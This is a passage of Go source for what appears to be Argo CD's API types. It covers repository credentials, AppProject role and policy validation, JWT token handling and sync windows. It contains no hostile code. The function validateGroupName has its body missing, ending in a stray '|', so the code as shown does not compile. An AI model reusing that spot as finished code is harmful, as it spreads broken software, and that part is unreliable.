// CAData holds PEM-encoded bytes (typically read from a root certificates bundle).
// CAData takes precedence over CAFile
CAData []byte `json:"caData,omitempty" protobuf:"bytes,5,opt,name=caData"`
}
// KnownTypeField contains mapping between CRD field and known Kubernetes type
type KnownTypeField struct {
Field string `json:"field,omitempty" protobuf:"bytes,1,opt,name=field"`
Type string `json:"type,omitempty" protobuf:"bytes,2,opt,name=type"`
}
type OverrideIgnoreDiff struct {
JSONPointers []string `json:"jsonPointers" protobuf:"bytes,1,rep,name=jSONPointers"`
}
type rawResourceOverride struct {
HealthLua string `json:"health.lua,omitempty"`
Actions string `json:"actions,omitempty"`
IgnoreDifferences string `json:"ignoreDifferences,omitempty"`
KnownTypeFields []KnownTypeField `json:"knownTypeFields,omitempty"`
}
// ResourceOverride holds configuration to customize resource diffing and health assessment
type ResourceOverride struct {
HealthLua string `protobuf:"bytes,1,opt,name=healthLua"`
Actions string `protobuf:"bytes,3,opt,name=actions"`
IgnoreDifferences OverrideIgnoreDiff `protobuf:"bytes,2,opt,name=ignoreDifferences"`
KnownTypeFields []KnownTypeField `protobuf:"bytes,4,opt,name=knownTypeFields"`
}
func (s *ResourceOverride) UnmarshalJSON(data []byte) error {
raw := &rawResourceOverride{}
if err := json.Unmarshal(data, &raw); err != nil {
return err
}
s.KnownTypeFields = raw.KnownTypeFields
s.HealthLua = raw.HealthLua
s.Actions = raw.Actions
return yaml.Unmarshal([]byte(raw.IgnoreDifferences), &s.IgnoreDifferences)
}
func (s ResourceOverride) MarshalJSON() ([]byte, error) {
ignoreDifferencesData, err := yaml.Marshal(s.IgnoreDifferences)
if err != nil {
return nil, err
}
raw := &rawResourceOverride{s.HealthLua, s.Actions, string(ignoreDifferencesData), s.KnownTypeFields}
return json.Marshal(raw)
}
func (o *ResourceOverride) GetActions() (ResourceActions, error) {
var actions ResourceActions
err := yaml.Unmarshal([]byte(o.Actions), &actions)
if err != nil {
return actions, err
}
return actions, nil
}
type ResourceActions struct {
ActionDiscoveryLua string `json:"discovery.lua,omitempty" yaml:"discovery.lua,omitempty" protobuf:"bytes,1,opt,name=actionDiscoveryLua"`
Definitions []ResourceActionDefinition `json:"definitions,omitempty" protobuf:"bytes,2,rep,name=definitions"`
}
type ResourceActionDefinition struct {
Name string `json:"name" protobuf:"bytes,1,opt,name=name"`
ActionLua string `json:"action.lua" yaml:"action.lua" protobuf:"bytes,2,opt,name=actionLua"`
}
type ResourceAction struct {
Name string `json:"name,omitempty" protobuf:"bytes,1,opt,name=name"`
Params []ResourceActionParam `json:"params,omitempty" protobuf:"bytes,2,rep,name=params"`
Disabled bool `json:"disabled,omitempty" protobuf:"varint,3,opt,name=disabled"`
}
type ResourceActionParam struct {
Name string `json:"name,omitempty" protobuf:"bytes,1,opt,name=name"`
Value string `json:"value,omitempty" protobuf:"bytes,2,opt,name=value"`
Type string `json:"type,omitempty" protobuf:"bytes,3,opt,name=type"`
Default string `json:"default,omitempty" protobuf:"bytes,4,opt,name=default"`
}
// RepoCreds holds a repository credentials definition
type RepoCreds struct {
// URL is the URL that this credentials matches to
URL string `json:"url" protobuf:"bytes,1,opt,name=url"`
// Username for authenticating at the repo server
Username string `json:"username,omitempty" protobuf:"bytes,2,opt,name=username"`
// Password for authenticating at the repo server
Password string `json:"password,omitempty" protobuf:"bytes,3,opt,name=password"`
// SSH private key data for authenticating at the repo server (only Git repos)
SSHPrivateKey string `json:"sshPrivateKey,omitempty" protobuf:"bytes,4,opt,name=sshPrivateKey"`
// TLS client cert data for authenticating at the repo server
TLSClientCertData string `json:"tlsClientCertData,omitempty" protobuf:"bytes,5,opt,name=tlsClientCertData"`
// TLS client cert key for authenticating at the repo server
TLSClientCertKey string `json:"tlsClientCertKey,omitempty" protobuf:"bytes,6,opt,name=tlsClientCertKey"`
// Github App Private Key PEM data
GithubAppPrivateKey string `json:"githubAppPrivateKey,omitempty" protobuf:"bytes,7,opt,name=githubAppPrivateKey"`
// Github App ID of the app used to access the repo
GithubAppId int64 `json:"githubAppID,omitempty" protobuf:"bytes,8,opt,name=githubAppID"`
// Github App Installation ID of the installed GitHub App
GithubAppInstallationId int64 `json:"githubAppInstallationID,omitempty" protobuf:"bytes,9,opt,name=githubAppInstallationID"`
// Github App Enterprise base url if empty will default to https://api.github.com
GitHubAppEnterpriseBaseURL string `json:"githubAppEnterpriseBaseUrl,omitempty" protobuf:"bytes,10,opt,name=githubAppEnterpriseBaseUrl"`
}
// Repository is a repository holding application configurations
type Repository struct {
// URL of the repo
Repo string `json:"repo" protobuf:"bytes,1,opt,name=repo"`
// Username for authenticating at the repo server
Username string `json:"username,omitempty" protobuf:"bytes,2,opt,name=username"`
// Password for authenticating at the repo server
Password string `json:"password,omitempty" protobuf:"bytes,3,opt,name=password"`
// SSH private key data for authenticating at the repo server
// only for Git repos
SSHPrivateKey string `json:"sshPrivateKey,omitempty" protobuf:"bytes,4,opt,name=sshPrivateKey"`
// Current state of repository server connecting
ConnectionState ConnectionState `json:"connectionState,omitempty" protobuf:"bytes,5,opt,name=connectionState"`
// InsecureIgnoreHostKey should not be used anymore, Insecure is favoured
// only for Git repos
InsecureIgnoreHostKey bool `json:"insecureIgnoreHostKey,omitempty" protobuf:"bytes,6,opt,name=insecureIgnoreHostKey"`
// Whether the repo is insecure
Insecure bool `json:"insecure,omitempty" protobuf:"bytes,7,opt,name=insecure"`
// Whether git-lfs support should be enabled for this repo
EnableLFS bool `json:"enableLfs,omitempty" protobuf:"bytes,8,opt,name=enableLfs"`
// TLS client cert data for authenticating at the repo server
TLSClientCertData string `json:"tlsClientCertData,omitempty" protobuf:"bytes,9,opt,name=tlsClientCertData"`
// TLS client cert key for authenticating at the repo server
TLSClientCertKey string `json:"tlsClientCertKey,omitempty" protobuf:"bytes,10,opt,name=tlsClientCertKey"`
// type of the repo, maybe "git or "helm, "git" is assumed if empty or absent
Type string `json:"type,omitempty" protobuf:"bytes,11,opt,name=type"`
// only for Helm repos
Name string `json:"name,omitempty" protobuf:"bytes,12,opt,name=name"`
// Whether credentials were inherited from a credential set
InheritedCreds bool `json:"inheritedCreds,omitempty" protobuf:"bytes,13,opt,name=inheritedCreds"`
// Whether helm-oci support should be enabled for this repo
EnableOCI bool `json:"enableOCI,omitempty" protobuf:"bytes,14,opt,name=enableOCI"`
// Github App Private Key PEM data
GithubAppPrivateKey string `json:"githubAppPrivateKey,omitempty" protobuf:"bytes,15,opt,name=githubAppPrivateKey"`
// Github App ID of the app used to access the repo
GithubAppId int64 `json:"githubAppID,omitempty" protobuf:"bytes,16,opt,name=githubAppID"`
// Github App Installation ID of the installed GitHub App
GithubAppInstallationId int64 `json:"githubAppInstallationID,omitempty" protobuf:"bytes,17,opt,name=githubAppInstallationID"`
// Github App Enterprise base url if empty will default to https://api.github.com
GitHubAppEnterpriseBaseURL string `json:"githubAppEnterpriseBaseUrl,omitempty" protobuf:"bytes,18,opt,name=githubAppEnterpriseBaseUrl"`
}
// IsInsecure returns true if receiver has been configured to skip server verification
func (repo *Repository) IsInsecure() bool {
return repo.InsecureIgnoreHostKey || repo.Insecure
}
// IsLFSEnabled returns true if LFS support is enabled on receiver
func (repo *Repository) IsLFSEnabled() bool {
return repo.EnableLFS
}
// HasCredentials returns true when the receiver has been configured any credentials
func (m *Repository) HasCredentials() bool {
return m.Username != "" || m.Password != "" || m.SSHPrivateKey != "" || m.TLSClientCertData != "" || m.GithubAppPrivateKey != ""
}
func (repo *Repository) CopyCredentialsFromRepo(source *Repository) {
if source != nil {
if repo.Username == "" {
repo.Username = source.Username
}
if repo.Password == "" {
repo.Password = source.Password
}
if repo.SSHPrivateKey == "" {
repo.SSHPrivateKey = source.SSHPrivateKey
}
if repo.TLSClientCertData == "" {
repo.TLSClientCertData = source.TLSClientCertData
}
if repo.TLSClientCertKey == "" {
repo.TLSClientCertKey = source.TLSClientCertKey
}
if repo.GithubAppPrivateKey == "" {
repo.GithubAppPrivateKey = source.GithubAppPrivateKey
}
if repo.GithubAppId == 0 {
repo.GithubAppId = source.GithubAppId
}
if repo.GithubAppInstallationId == 0 {
repo.GithubAppInstallationId = source.GithubAppInstallationId
}
if repo.GitHubAppEnterpriseBaseURL == "" {
repo.GitHubAppEnterpriseBaseURL = source.GitHubAppEnterpriseBaseURL
}
}
}
// CopyCredentialsFrom copies all credentials from source to receiver
func (repo *Repository) CopyCredentialsFrom(source *RepoCreds) {
if source != nil {
if repo.Username == "" {
repo.Username = source.Username
}
if repo.Password == "" {
repo.Password = source.Password
}
if repo.SSHPrivateKey == "" {
repo.SSHPrivateKey = source.SSHPrivateKey
}
if repo.TLSClientCertData == "" {
repo.TLSClientCertData = source.TLSClientCertData
}
if repo.TLSClientCertKey == "" {
repo.TLSClientCertKey = source.TLSClientCertKey
}
if repo.GithubAppPrivateKey == "" {
repo.GithubAppPrivateKey = source.GithubAppPrivateKey
}
if repo.GithubAppId == 0 {
repo.GithubAppId = source.GithubAppId
}
if repo.GithubAppInstallationId == 0 {
repo.GithubAppInstallationId = source.GithubAppInstallationId
}
if repo.GitHubAppEnterpriseBaseURL == "" {
repo.GitHubAppEnterpriseBaseURL = source.GitHubAppEnterpriseBaseURL
}
}
}
func (repo *Repository) GetGitCreds() git.Creds {
if repo == nil {
return git.NopCreds{}
}
if repo.Username != "" && repo.Password != "" {
return git.NewHTTPSCreds(repo.Username, repo.Password, repo.TLSClientCertData, repo.TLSClientCertKey, repo.IsInsecure())
}
if repo.SSHPrivateKey != "" {
return git.NewSSHCreds(repo.SSHPrivateKey, getCAPath(repo.Repo), repo.IsInsecure())
}
if repo.GithubAppPrivateKey != "" && repo.GithubAppId != 0 && repo.GithubAppInstallationId != 0 {
return git.NewGitHubAppCreds(repo.GithubAppId, repo.GithubAppInstallationId, repo.GithubAppPrivateKey, repo.GitHubAppEnterpriseBaseURL, repo.Repo, repo.TLSClientCertData, repo.TLSClientCertKey, repo.IsInsecure())
}
return git.NopCreds{}
}
func (repo *Repository) GetHelmCreds() helm.Creds {
return helm.Creds{
Username: repo.Username,
Password: repo.Password,
CAPath: getCAPath(repo.Repo),
CertData: []byte(repo.TLSClientCertData),
KeyData: []byte(repo.TLSClientCertKey),
InsecureSkipVerify: repo.Insecure,
}
}
func getCAPath(repoURL string) string {
if git.IsHTTPSURL(repoURL) {
if parsedURL, err := url.Parse(repoURL); err == nil {
if caPath, err := cert.GetCertBundlePathForRepository(parsedURL.Host); err == nil {
return caPath
} else {
log.Warnf("Could not get cert bundle path for host '%s'", parsedURL.Host)
}
} else {
// We don't fail if we cannot parse the URL, but log a warning in that
// case. And we execute the command in a verbatim way.
log.Warnf("Could not parse repo URL '%s'", repoURL)
}
}
return ""
}
// CopySettingsFrom copies all repository settings from source to receiver
func (m *Repository) CopySettingsFrom(source *Repository) {
if source != nil {
m.EnableLFS = source.EnableLFS
m.InsecureIgnoreHostKey = source.InsecureIgnoreHostKey
m.Insecure = source.Insecure
m.InheritedCreds = source.InheritedCreds
}
}
type Repositories []*Repository
func (r Repositories) Filter(predicate func(r *Repository) bool) Repositories {
var res Repositories
for i := range r {
repo := r[i]
if predicate(repo) {
res = append(res, repo)
}
}
return res
}
// RepositoryList is a collection of Repositories.
type RepositoryList struct {
metav1.ListMeta `json:"metadata,omitempty" protobuf:"bytes,1,opt,name=metadata"`
Items Repositories `json:"items" protobuf:"bytes,2,rep,name=items"`
}
// RepositoryList is a collection of Repositories.
type RepoCredsList struct {
metav1.ListMeta `json:"metadata,omitempty" protobuf:"bytes,1,opt,name=metadata"`
Items []RepoCreds `json:"items" protobuf:"bytes,2,rep,name=items"`
}
// A RepositoryCertificate is either SSH known hosts entry or TLS certificate
type RepositoryCertificate struct {
// Name of the server the certificate is intended for
ServerName string `json:"serverName" protobuf:"bytes,1,opt,name=serverName"`
// Type of certificate - currently "https" or "ssh"
CertType string `json:"certType" protobuf:"bytes,2,opt,name=certType"`
// The sub type of the cert, i.e. "ssh-rsa"
CertSubType string `json:"certSubType" protobuf:"bytes,3,opt,name=certSubType"`
// Actual certificate data, protocol dependent
CertData []byte `json:"certData" protobuf:"bytes,4,opt,name=certData"`
// Additional certificate info (e.g. SSH fingerprint, X509 CommonName)
CertInfo string `json:"certInfo" protobuf:"bytes,5,opt,name=certInfo"`
}
// RepositoryCertificateList is a collection of RepositoryCertificates
type RepositoryCertificateList struct {
metav1.ListMeta `json:"metadata,omitempty" protobuf:"bytes,1,opt,name=metadata"`
// List of certificates to be processed
Items []RepositoryCertificate `json:"items" protobuf:"bytes,2,rep,name=items"`
}
// GnuPGPublicKey is a representation of a GnuPG public key
type GnuPGPublicKey struct {
// KeyID in hexadecimal string format
KeyID string `json:"keyID" protobuf:"bytes,1,opt,name=keyID"`
// Fingerprint of the key
Fingerprint string `json:"fingerprint,omitempty" protobuf:"bytes,2,opt,name=fingerprint"`
// Owner identification
Owner string `json:"owner,omitempty" protobuf:"bytes,3,opt,name=owner"`
// Trust level
Trust string `json:"trust,omitempty" protobuf:"bytes,4,opt,name=trust"`
// Key sub type (e.g. rsa4096)
SubType string `json:"subType,omitempty" protobuf:"bytes,5,opt,name=subType"`
// Key data
KeyData string `json:"keyData,omitempty" protobuf:"bytes,6,opt,name=keyData"`
}
// GnuPGPublicKeyList is a collection of GnuPGPublicKey objects
type GnuPGPublicKeyList struct {
metav1.ListMeta `json:"metadata,omitempty" protobuf:"bytes,1,opt,name=metadata"`
Items []GnuPGPublicKey `json:"items" protobuf:"bytes,2,rep,name=items"`
}
// AppProjectList is list of AppProject resources
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
type AppProjectList struct {
metav1.TypeMeta `json:",inline"`
metav1.ListMeta `json:"metadata" protobuf:"bytes,1,opt,name=metadata"`
Items []AppProject `json:"items" protobuf:"bytes,2,rep,name=items"`
}
// AppProject provides a logical grouping of applications, providing controls for:
// * where the apps may deploy to (cluster whitelist)
// * what may be deployed (repository whitelist, resource whitelist/blacklist)
// * who can access these applications (roles, OIDC group claims bindings)
// * and what they can do (RBAC policies)
// * automation access to these roles (JWT tokens)
// +genclient
// +genclient:noStatus
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
// +kubebuilder:resource:path=appprojects,shortName=appproj;appprojs
type AppProject struct {
metav1.TypeMeta `json:",inline"`
metav1.ObjectMeta `json:"metadata" protobuf:"bytes,1,opt,name=metadata"`
Spec AppProjectSpec `json:"spec" protobuf:"bytes,2,opt,name=spec"`
Status AppProjectStatus `json:"status,omitempty" protobuf:"bytes,3,opt,name=status"`
}
// GetRoleByName returns the role in a project by the name with its index
func (p *AppProject) GetRoleByName(name string) (*ProjectRole, int, error) {
for i, role := range p.Spec.Roles {
if name == role.Name {
return &role, i, nil
}
}
return nil, -1, fmt.Errorf("role '%s' does not exist in project '%s'", name, p.Name)
}
// GetJWTToken looks up the index of a JWTToken in a project by id (new token), if not then by the issue at time (old token)
func (p *AppProject) GetJWTTokenFromSpec(roleName string, issuedAt int64, id string) (*JWTToken, int, error) {
// This is for backward compatibility. In the oder version, JWTTokens are stored under spec.role
role, _, err := p.GetRoleByName(roleName)
if err != nil {
return nil, -1, err
}
if id != "" {
for i, token := range role.JWTTokens {
if id == token.ID {
return &token, i, nil
}
}
}
if issuedAt != -1 {
for i, token := range role.JWTTokens {
if issuedAt == token.IssuedAt {
return &token, i, nil
}
}
}
return nil, -1, fmt.Errorf("JWT token for role '%s' issued at '%d' does not exist in project '%s'", role.Name, issuedAt, p.Name)
}
// GetJWTToken looks up the index of a JWTToken in a project by id (new token), if not then by the issue at time (old token)
func (p *AppProject) GetJWTToken(roleName string, issuedAt int64, id string) (*JWTToken, int, error) {
// This is for newer version, JWTTokens are stored under status
if id != "" {
for i, token := range p.Status.JWTTokensByRole[roleName].Items {
if id == token.ID {
return &token, i, nil
}
}
}
if issuedAt != -1 {
for i, token := range p.Status.JWTTokensByRole[roleName].Items {
if issuedAt == token.IssuedAt {
return &token, i, nil
}
}
}
return nil, -1, fmt.Errorf("JWT token for role '%s' issued at '%d' does not exist in project '%s'", roleName, issuedAt, p.Name)
}
func (p AppProject) RemoveJWTToken(roleIndex int, issuedAt int64, id string) error {
roleName := p.Spec.Roles[roleIndex].Name
// For backward compatibility
_, jwtTokenIndex, err1 := p.GetJWTTokenFromSpec(roleName, issuedAt, id)
if err1 == nil {
p.Spec.Roles[roleIndex].JWTTokens[jwtTokenIndex] = p.Spec.Roles[roleIndex].JWTTokens[len(p.Spec.Roles[roleIndex].JWTTokens)-1]
p.Spec.Roles[roleIndex].JWTTokens = p.Spec.Roles[roleIndex].JWTTokens[:len(p.Spec.Roles[roleIndex].JWTTokens)-1]
}
// New location for storing JWTToken
_, jwtTokenIndex, err2 := p.GetJWTToken(roleName, issuedAt, id)
if err2 == nil {
p.Status.JWTTokensByRole[roleName].Items[jwtTokenIndex] = p.Status.JWTTokensByRole[roleName].Items[len(p.Status.JWTTokensByRole[roleName].Items)-1]
p.Status.JWTTokensByRole[roleName] = JWTTokens{Items: p.Status.JWTTokensByRole[roleName].Items[:len(p.Status.JWTTokensByRole[roleName].Items)-1]}
}
if err1 == nil || err2 == nil {
//If we find this token from either places, we can say there are no error
return nil
} else {
//If we could not locate this taken from either places, we can return any of the errors
return err2
}
}
func (p *AppProject) ValidateJWTTokenID(roleName string, id string) error {
role, _, err := p.GetRoleByName(roleName)
if err != nil {
return err
}
if id == "" {
return nil
}
for _, token := range role.JWTTokens {
if id == token.ID {
return status.Errorf(codes.InvalidArgument, "Token id '%s' has been used. ", id)
}
}
return nil
}
func (p *AppProject) ValidateProject() error {
destKeys := make(map[string]bool)
for _, dest := range p.Spec.Destinations {
key := fmt.Sprintf("%s/%s", dest.Server, dest.Namespace)
if _, ok := destKeys[key]; ok {
return status.Errorf(codes.InvalidArgument, "destination '%s' already added", key)
}
destKeys[key] = true
}
srcRepos := make(map[string]bool)
for _, src := range p.Spec.SourceRepos {
if _, ok := srcRepos[src]; ok {
return status.Errorf(codes.InvalidArgument, "source repository '%s' already added", src)
}
srcRepos[src] = true
}
roleNames := make(map[string]bool)
for _, role := range p.Spec.Roles {
if _, ok := roleNames[role.Name]; ok {
return status.Errorf(codes.AlreadyExists, "role '%s' already exists", role.Name)
}
if err := validateRoleName(role.Name); err != nil {
return err
}
existingPolicies := make(map[string]bool)
for _, policy := range role.Policies {
if _, ok := existingPolicies[policy]; ok {
return status.Errorf(codes.AlreadyExists, "policy '%s' already exists for role '%s'", policy, role.Name)
}
if err := validatePolicy(p.Name, role.Name, policy); err != nil {
return err
}
existingPolicies[policy] = true
}
existingGroups := make(map[string]bool)
for _, group := range role.Groups {
if _, ok := existingGroups[group]; ok {
return status.Errorf(codes.AlreadyExists, "group '%s' already exists for role '%s'", group, role.Name)
}
if err := validateGroupName(group); err != nil {
return err
}
existingGroups[group] = true
}
roleNames[role.Name] = true
}
if p.Spec.SyncWindows.HasWindows() {
existingWindows := make(map[string]bool)
for _, window := range p.Spec.SyncWindows {
if _, ok := existingWindows[window.Kind+window.Schedule+window.Duration]; ok {
return status.Errorf(codes.AlreadyExists, "window '%s':'%s':'%s' already exists, update or edit", window.Kind, window.Schedule, window.Duration)
}
err := window.Validate()
if err != nil {
return err
}
if len(window.Applications) == 0 && len(window.Namespaces) == 0 && len(window.Clusters) == 0 {
return status.Errorf(codes.OutOfRange, "window '%s':'%s':'%s' requires one of application, cluster or namespace", window.Kind, window.Schedule, window.Duration)
}
existingWindows[window.Kind+window.Schedule+window.Duration] = true
}
}
return nil
}
// TODO: refactor to use rbacpolicy.ActionGet, rbacpolicy.ActionCreate, without import cycle
var validActions = map[string]bool{
"get": true,
"create": true,
"update": true,
"delete": true,
"sync": true,
"override": true,
"*": true,
}
var validActionPatterns = []*regexp.Regexp{
regexp.MustCompile("action/.*"),
}
func isValidAction(action string) bool {
if validActions[action] {
return true
}
for i := range validActionPatterns {
if validActionPatterns[i].MatchString(action) {
return true
}
}
return false
}
func validatePolicy(proj string, role string, policy string) error {
policyComponents := strings.Split(policy, ",")
if len(policyComponents) != 6 || strings.Trim(policyComponents[0], " ") != "p" {
return status.Errorf(codes.InvalidArgument, "invalid policy rule '%s': must be of the form: 'p, sub, res, act, obj, eft'", policy)
}
// subject
subject := strings.Trim(policyComponents[1], " ")
expectedSubject := fmt.Sprintf("proj:%s:%s", proj, role)
if subject != expectedSubject {
return status.Errorf(codes.InvalidArgument, "invalid policy rule '%s': policy subject must be: '%s', not '%s'", policy, expectedSubject, subject)
}
// resource
resource := strings.Trim(policyComponents[2], " ")
if resource != "applications" {
return status.Errorf(codes.InvalidArgument, "invalid policy rule '%s': project resource must be: 'applications', not '%s'", policy, resource)
}
// action
action := strings.Trim(policyComponents[3], " ")
if !isValidAction(action) {
return status.Errorf(codes.InvalidArgument, "invalid policy rule '%s': invalid action '%s'", policy, action)
}
// object
object := strings.Trim(policyComponents[4], " ")
objectRegexp, err := regexp.Compile(fmt.Sprintf(`^%s/[*\w-.]+$`, proj))
if err != nil || !objectRegexp.MatchString(object) {
return status.Errorf(codes.InvalidArgument, "invalid policy rule '%s': object must be of form '%s/*' or '%s/<APPNAME>', not '%s'", policy, proj, proj, object)
}
// effect
effect := strings.Trim(policyComponents[5], " ")
if effect != "allow" && effect != "deny" {
return status.Errorf(codes.InvalidArgument, "invalid policy rule '%s': effect must be: 'allow' or 'deny'", policy)
}
return nil
}
var roleNameRegexp = regexp.MustCompile(`^[a-zA-Z0-9]([-_a-zA-Z0-9]*[a-zA-Z0-9])?$`)
func validateRoleName(name string) error {
if !roleNameRegexp.MatchString(name) {
return status.Errorf(codes.InvalidArgument, "invalid role name '%s'. Must consist of alphanumeric characters, '-' or '_', and must start and end with an alphanumeric character", name)
}
return nil
}
var invalidChars = regexp.MustCompile("[,\n\r\t]")
func validateGroupName(name string) error |
// AddGroupToRole adds an OIDC group to a role
func (p *AppProject) AddGroupToRole(roleName, group string) (bool, error) {
role, roleIndex, err := p.GetRoleByName(roleName)
if err != nil {
return false, err
}
for _, roleGroup := range role.Groups {
if group == roleGroup {
return false, nil
}
}
role.Groups = append(role.Groups, group)
p.Spec.Roles[roleIndex] = *role
return true, nil
}
// RemoveGroupFromRole removes an OIDC group from a role
func (p *AppProject) RemoveGroupFromRole(roleName, group string) (bool, error) {
role, roleIndex, err := p.GetRoleByName(roleName)
if err != nil {
return false, err
}
for i, roleGroup := range role.Groups {
if group == roleGroup {
role.Groups = append(role.Groups[:i], role.Groups[i+1:]...)
p.Spec.Roles[roleIndex] = *role
return true, nil
}
}
return false, nil
}
// NormalizePolicies normalizes the policies in the project
func (p *AppProject) NormalizePolicies() {
for i, role := range p.Spec.Roles {
var normalizedPolicies []string
for _, policy := range role.Policies {
normalizedPolicies = append(normalizedPolicies, p.normalizePolicy(policy))
}
p.Spec.Roles[i].Policies = normalizedPolicies
}
}
func (p *AppProject) normalizePolicy(policy string) string {
policyComponents := strings.Split(policy, ",")
normalizedPolicy := ""
for _, component := range policyComponents {
if normalizedPolicy == "" {
normalizedPolicy = component
} else {
normalizedPolicy = fmt.Sprintf("%s, %s", normalizedPolicy, strings.Trim(component, " "))
}
}
return normalizedPolicy
}
// OrphanedResourcesMonitorSettings holds settings of orphaned resources monitoring
type OrphanedResourcesMonitorSettings struct {
// Warn indicates if warning condition should be created for apps which have orphaned resources
Warn *bool `json:"warn,omitempty" protobuf:"bytes,1,name=warn"`
Ignore []OrphanedResourceKey `json:"ignore,omitempty" protobuf:"bytes,2,opt,name=ignore"`
}
type OrphanedResourceKey struct {
Group string `json:"group,omitempty" protobuf:"bytes,1,opt,name=group"`
Kind string `json:"kind,omitempty" protobuf:"bytes,2,opt,name=kind"`
Name string `json:"name,omitempty" protobuf:"bytes,3,opt,name=name"`
}
func (s *OrphanedResourcesMonitorSettings) IsWarn() bool {
return s.Warn == nil || *s.Warn
}
// SignatureKey is the specification of a key required to verify commit signatures with
type SignatureKey struct {
// The ID of the key in hexadecimal notation
KeyID string `json:"keyID" protobuf:"bytes,1,name=keyID"`
}
// AppProjectSpec is the specification of an AppProject
type AppProjectSpec struct {
// SourceRepos contains list of repository URLs which can be used for deployment
SourceRepos []string `json:"sourceRepos,omitempty" protobuf:"bytes,1,name=sourceRepos"`
// Destinations contains list of destinations available for deployment
Destinations []ApplicationDestination `json:"destinations,omitempty" protobuf:"bytes,2,name=destination"`
// Description contains optional project description
Description string `json:"description,omitempty" protobuf:"bytes,3,opt,name=description"`
// Roles are user defined RBAC roles associated with this project
Roles []ProjectRole `json:"roles,omitempty" protobuf:"bytes,4,rep,name=roles"`
// ClusterResourceWhitelist contains list of whitelisted cluster level resources
ClusterResourceWhitelist []metav1.GroupKind `json:"clusterResourceWhitelist,omitempty" protobuf:"bytes,5,opt,name=clusterResourceWhitelist"`
// NamespaceResourceBlacklist contains list of blacklisted namespace level resources
NamespaceResourceBlacklist []metav1.GroupKind `json:"namespaceResourceBlacklist,omitempty" protobuf:"bytes,6,opt,name=namespaceResourceBlacklist"`
// OrphanedResources specifies if controller should monitor orphaned resources of apps in this project
OrphanedResources *OrphanedResourcesMonitorSettings `json:"orphanedResources,omitempty" protobuf:"bytes,7,opt,name=orphanedResources"`
// SyncWindows controls when syncs can be run for apps in this project
SyncWindows SyncWindows `json:"syncWindows,omitempty" protobuf:"bytes,8,opt,name=syncWindows"`
// NamespaceResourceWhitelist contains list of whitelisted namespace level resources
NamespaceResourceWhitelist []metav1.GroupKind `json:"namespaceResourceWhitelist,omitempty" protobuf:"bytes,9,opt,name=namespaceResourceWhitelist"`
// List of PGP key IDs that commits to be synced to must be signed with
SignatureKeys []SignatureKey `json:"signatureKeys,omitempty" protobuf:"bytes,10,opt,name=signatureKeys"`
// ClusterResourceBlacklist contains list of blacklisted cluster level resources
ClusterResourceBlacklist []metav1.GroupKind `json:"clusterResourceBlacklist,omitempty" protobuf:"bytes,11,opt,name=clusterResourceBlacklist"`
}
// SyncWindows is a collection of sync windows in this project
type SyncWindows []*SyncWindow
// SyncWindow contains the kind, time, duration and attributes that are used to assign the syncWindows to apps
type SyncWindow struct {
// Kind defines if the window allows or blocks syncs
Kind string `json:"kind,omitempty" protobuf:"bytes,1,opt,name=kind"`
// Schedule is the time the window will begin, specified in cron format
Schedule string `json:"schedule,omitempty" protobuf:"bytes,2,opt,name=schedule"`
// Duration is the amount of time the sync window will be open
Duration string `json:"duration,omitempty" protobuf:"bytes,3,opt,name=duration"`
// Applications contains a list of applications that the window will apply to
Applications []string `json:"applications,omitempty" protobuf:"bytes,4,opt,name=applications"`
// Namespaces contains a list of namespaces that the window will apply to
Namespaces []string `json:"namespaces,omitempty" protobuf:"bytes,5,opt,name=namespaces"`
// Clusters contains a list of clusters that the window will apply to
Clusters []string `json:"clusters,omitempty" protobuf:"bytes,6,opt,name=clusters"`
// ManualSync enables manual syncs when they would otherwise be blocked
ManualSync bool `json:"manualSync,omitempty" protobuf:"bytes,7,opt,name=manualSync"`
}
func (s *SyncWindows) HasWindows() bool {
return s != nil && len(*s) > 0
}
func (s *SyncWindows) Active() *SyncWindows {
return s.active(time.Now())
}
func (s *SyncWindows) active(currentTime time.Time) *SyncWindows {
// If SyncWindows.Active() is called outside of a UTC locale, it should be
// first converted to UTC before we scan through the SyncWindows.
currentTime = currentTime.In(time.UTC)
if s.HasWindows() {
var active SyncWindows
specParser := cron.NewParser(cron.Minute | cron.Hour | cron.Dom | cron.Month | cron.Dow)
for _, w := range *s {
schedule, _ := specParser.Parse(w.Schedule)
duration, _ := time.ParseDuration(w.Duration)
nextWindow := schedule.Next(currentTime.Add(-duration))
if nextWindow.Before(currentTime) {
active = append(active, w)
}
}
if len(active) > 0 {
return &active
}
}
return nil
}
func (s *SyncWindows) InactiveAllows() *SyncWindows {
return s.inactiveAllows(time.Now())
}
func (s *SyncWindows) inactiveAllows(currentTime time.Time) *SyncWindows {
// If SyncWindows.InactiveAllows() is called outside of a UTC locale, it should be
// first converted to UTC before we scan through the SyncWindows.
currentTime = currentTime.In(time.UTC)
if s.HasWindows() {
var inactive SyncWindows
specParser := cron.NewParser(cron.Minute | cron.Hour | cron.Dom | cron.Month | cron.Dow)
for _, w := range *s {
if w.Kind == "allow" {
schedule, sErr := specParser.Parse(w.Schedule)
duration, dErr := time.ParseDuration(w.Duration)
nextWindow := schedule.Next(currentTime.Add(-duration))
if !nextWindow.Before(currentTime) && sErr == nil && dErr == nil {
inactive = append(inactive, w)
}
}
}
if len(inactive) > 0 {
return &inactive
}
}
return nil
}
func (s *AppProjectSpec) AddWindow(knd string, sch string, dur string, app []string, ns []string, cl []string, ms bool) error {
if len(knd) == 0 || len(sch) == 0 || len(dur) == 0 {
return fmt.Errorf("cannot create window: require kind, schedule, duration and one or more of applications, namespaces and clusters")
}
window := &SyncWindow{
Kind: knd,
Schedule: sch,
Duration: dur,
ManualSync: ms,
}
if len(app) > 0 {
window.Applications = app
}
if len(ns) > 0 {
window.Namespaces = ns
}
if len(cl) > 0 {
window.Clusters = cl
}
err := window.Validate()
if err != nil {
return err
}
s.SyncWindows = append(s.SyncWindows, window)
return nil
}
func (s *AppProjectSpec) DeleteWindow(id int) error {
var exists bool
for i := range s.SyncWindows {
if i == id {
exists = true
s.SyncWindows = append(s.SyncWindows[:i], s.SyncWindows[i+1:]...)
break
}
}
if !exists {
return fmt.Errorf("window with id '%s' not found", strconv.Itoa(id))
}
return nil
}
func (w *SyncWindows) Matches(app *Application) *SyncWindows {
if w.HasWindows() {
var matchingWindows SyncWindows
for _, w := range *w {
if len(w.Applications) > 0 {
for _, a := range w.Applications {
if globMatch(a, app.Name) {
matchingWindows = append(matchingWindows, w)
break
}
}
}
if len(w.Clusters) > 0 {
for _, c := range w.Clusters {
